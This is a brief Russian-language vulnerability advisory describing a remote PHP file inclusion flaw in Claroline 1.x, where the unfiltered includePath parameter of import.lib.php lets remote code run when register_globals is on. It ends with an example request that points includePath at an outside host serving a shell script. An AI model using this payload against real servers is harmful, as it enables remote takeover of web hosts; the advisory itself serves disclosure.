Программа: Claroline 1.x
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "includePath" сценарием claroline/inc/lib/import.lib.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Успешное эксплуатирование уязвимости требует включение опции "register_globals".
Пример:
claroline/inc/lib/import.lib.php?includePath=http://shell/cmd.do?